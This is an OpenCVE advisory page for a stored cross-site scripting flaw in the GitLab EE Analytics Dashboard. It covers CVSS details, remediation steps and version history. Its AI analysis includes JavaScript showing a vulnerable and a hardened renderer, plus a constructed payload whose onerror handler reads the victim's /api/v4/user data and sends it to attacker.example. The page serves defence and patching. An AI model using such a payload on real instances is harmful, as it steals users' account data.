Description
GitLab has remediated an issue in GitLab EE affecting all versions from 17.1 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with developer-role permissions to execute arbitrary client-side code on behalf of a targeted user due to improper input sanitization in the Analytics Dashboard.
Published: 2026-06-11
Score: 8.7 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

GitLab Enterprise Edition releases from 17.1 before 18.10.8, from 18.11 before 18.11.5, and from 19.0 before 19.0.2 carry an improper input sanitization flaw in the Analytics Dashboard. An authenticated user with developer-level permissions could inject script that runs in the browser of any user who views the affected dashboard. This is a classic cross-site scripting flaw (CWE-79): the injected code executes in the victim's origin with the victim's session, so it can act on the victim's behalf against the GitLab API, read anything the victim can see, hijack the session, or stage further client-side attacks. The CVSS vector records this as a scope change (S:C) with high confidentiality and integrity impact and no availability impact.
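The advisory does not say which dashboard field is mis-handled. What follows is an added illustration, not GitLab code, of the pattern CWE-79 names: a hypothetical panel renderer that interpolates a developer-supplied title into HTML, beside a hardened version, with a constructed payload and a regression check that flags any tag the template itself did not emit. The field names, the allow-list and the payload are all assumptions made for the example.

```javascript
// Added example, not GitLab code: a hypothetical dashboard panel renderer.
// The real injection point in the Analytics Dashboard is not described in the
// advisory; this shows the pattern CWE-79 names, an attacker-controlled string
// reaching markup without neutralization, next to the fix.

// Constructed input: a panel definition as a developer-role user might save it.
// The title carries an event-handler payload, so it needs no <script> tag.
const CONSTRUCTED_PANEL = {
  title: 'Deploys per day <img src=x onerror="fetch(\'/api/v4/user\').then(r=>r.text()).then(t=>fetch(\'https://attacker.example/?d=\'+encodeURIComponent(t)))">',
  visualization: 'line_chart',
};

// Vulnerable: the title is interpolated straight into HTML, so the browser of
// whoever opens the dashboard parses the attacker's tag and runs onerror in the
// victim's origin and session (the S:C in the CVSS vector).
function renderPanelUnsafe(panel) {
  return `<div class="panel"><h2 class="panel-title">${panel.title}</h2>` +
    `<div class="viz" data-viz="${panel.visualization}"></div></div>`;
}

// Hardened: neutralize the five HTML-significant characters in any free-text
// field, and allow-list enumerated fields instead of echoing them.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Hypothetical allow-list; a real renderer would take it from the schema.
const ALLOWED_VISUALIZATIONS = new Set(['line_chart', 'bar_chart', 'single_stat']);
function renderPanelSafe(panel) {
  const viz = ALLOWED_VISUALIZATIONS.has(panel.visualization) ? panel.visualization : 'single_stat';
  return `<div class="panel"><h2 class="panel-title">${escapeHtml(panel.title)}</h2>` +
    `<div class="viz" data-viz="${viz}"></div></div>`;
}

// Regression check for a test suite: the only tags in the rendered output must
// be the ones the template emits. Any other tag name means user text reached
// the parser as markup.
const TEMPLATE_TAGS = new Set(['div', 'h2']);
function foreignTags(html) {
  const found = [];
  for (const m of html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9-]*)/g)) {
    const tag = m[1].toLowerCase();
    if (!TEMPLATE_TAGS.has(tag)) found.push(tag);
  }
  return found;
}

console.log('unsafe foreign tags:', foreignTags(renderPanelUnsafe(CONSTRUCTED_PANEL))); // [ 'img' ]
console.log('safe foreign tags:  ', foreignTags(renderPanelSafe(CONSTRUCTED_PANEL)));   // []
```

Run it with node. In a component framework the equivalent sink is any API that sets raw HTML from data (v-html in Vue, innerHTML in the DOM); the fix is the same in every case: keep free text out of markup, escape it at the boundary where it becomes HTML, and allow-list enumerated values rather than echoing them.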

Affected Systems

The affected product is GitLab Enterprise Edition in three version ranges: 17.1 up to but not including 18.10.8, 18.11 up to but not including 18.11.5, and 19.0 up to but not including 19.0.2. Releases before 17.1, and releases at or after the fixed version of each branch, are not listed as affected. The advisory names only the Analytics Dashboard; no other GitLab component is described as affected.
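As an added example (not GitLab or OpenCVE tooling), a small checker that maps an installed version string onto the three ranges above and names the release to move to. The ranges are taken from the advisory text; the version strings in the inventory are constructed.

```javascript
// Added example, not GitLab or OpenCVE tooling: decide whether an installed
// GitLab EE version falls in the affected ranges stated in the advisory and,
// if so, which fixed release to move to.

// Affected ranges and fixed releases, taken from the advisory text:
//   17.1 <= v < 18.10.8, 18.11 <= v < 18.11.5, 19.0 <= v < 19.0.2
const AFFECTED_RANGES = [
  { from: [17, 1, 0], fixed: [18, 10, 8] },
  { from: [18, 11, 0], fixed: [18, 11, 5] },
  { from: [19, 0, 0], fixed: [19, 0, 2] },
];

// Parse "18.10.3-ee" / "19.0.0-rc1" style strings to [major, minor, patch].
// Pre-release suffixes are ignored, which treats a release candidate as its
// final version: conservative, since "19.0.0-rc1" is then reported as affected.
function parseVersion(text) {
  const m = /^(\d+)\.(\d+)(?:\.(\d+))?/.exec(String(text).trim());
  if (!m) throw new Error(`unrecognised version string: ${text}`);
  return [Number(m[1]), Number(m[2]), Number(m[3] ?? 0)];
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

const formatVersion = (v) => v.join('.');

// Returns null when the version is outside every affected range, otherwise
// the fixed release for the range it falls in.
function requiredUpgrade(text) {
  const v = parseVersion(text);
  for (const { from, fixed } of AFFECTED_RANGES) {
    if (compareVersions(v, from) >= 0 && compareVersions(v, fixed) < 0) {
      return formatVersion(fixed);
    }
  }
  return null;
}

function isAffected(text) {
  return requiredUpgrade(text) !== null;
}

// Constructed sample inventory, e.g. collected from `gitlab-rake gitlab:env:info`
// or from GET /api/v4/version on each instance.
const CONSTRUCTED_INVENTORY = ['17.0.9-ee', '17.11.2-ee', '18.10.7-ee', '18.10.8-ee', '18.11.0-ee', '19.0.1-ee', '19.1.0-ee'];
for (const ver of CONSTRUCTED_INVENTORY) {
  const fix = requiredUpgrade(ver);
  console.log(`${ver.padEnd(12)} ${fix ? `AFFECTED -> upgrade to ${fix}` : 'not in an affected range'}`);
}
```

Note that the whole of 17.1 through 18.9 resolves to 18.10.8: the advisory lists no patched release inside those branches, so an instance on, say, 17.11 has to cross into 18.10.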

Risk and Exploitability

The CVSS 3.1 base score of 8.7 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N) classifies this issue as high severity: it is reachable over the network with low complexity by a low-privileged account, needs the victim to open the dashboard (UI:R), and changes scope because code supplied through the attacker's account executes in another user's browser session. The EPSS estimate is below 1%, the SSVC assessment records no known exploitation and rates the issue as not automatable, and the KEV catalog does not list it. The advisory does not say which dashboard field is affected; the plausible path is a developer-role user storing a dashboard entry that contains markup or script, which executes when a target user opens that dashboard. Exploitation needs a developer-role account plus a victim who views the poisoned dashboard, so the risk is greatest on instances that grant the developer role broadly, and wherever privileged users (maintainers, owners, administrators) routinely open dashboards authored by others.

Generated by OpenCVE AI on June 11, 2026 at 12:25 UTC.

Remediation

Vendor Solution

Upgrade to 18.10.8, 18.11.5, or 19.0.2, or any later release.


OpenCVE Recommended Actions

  • Upgrade GitLab EE to at least 18.10.8, 18.11.5, or 19.0.2 for the 18.10, 18.11, and 19.0 branches respectively; installs on 17.1 through 18.9 have no patched release of their own and must move to 18.10.8 or later.
  • Grant the developer role only to users who need it, and review group- and project-level membership for broad or stale developer access.
  • Disable the Analytics Dashboard feature where it is not needed, or restrict who can author dashboard content, until the patch is applied. The viewer is the victim, not the author: limiting the feature to administrators does not protect an administrator who opens a dashboard that a developer-role user has already edited.


Advisories

No advisories yet.

History

Thu, 11 Jun 2026 13:30:00 +0000

Type    | Values Removed | Values Added
--------|----------------|-------------
Metrics |                | ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Thu, 11 Jun 2026 11:30:00 +0000

Type                | Values Removed | Values Added
--------------------|----------------|-------------
Description         |                | GitLab has remediated an issue in GitLab EE affecting all versions from 17.1 before 18.10.8, 18.11 before 18.11.5, and 19.0 before 19.0.2 that under certain conditions could have allowed an authenticated user with developer-role permissions to execute arbitrary client-side code on behalf of a targeted user due to improper input sanitization in the Analytics Dashboard.
Title               |                | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in GitLab
First Time appeared |                | Gitlab; Gitlab gitlab
Weaknesses          |                | CWE-79
CPEs                |                | cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*
Vendors & Products  |                | Gitlab; Gitlab gitlab
References          |                |
Metrics             |                | cvssV3_1: {'score': 8.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}


MITRE

Status: PUBLISHED

Assigner: GitLab

Published:

Updated: 2026-06-11T12:39:51.628Z

Reserved: 2026-05-29T12:04:44.827Z

Link: CVE-2026-10087

Vulnrichment

Updated: 2026-06-11T12:39:45.453Z

NVD

Status: Received

Published: 2026-06-11T12:16:30.820

Modified: 2026-06-11T12:16:30.820

Link: CVE-2026-10087

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-06-11T12:30:14Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')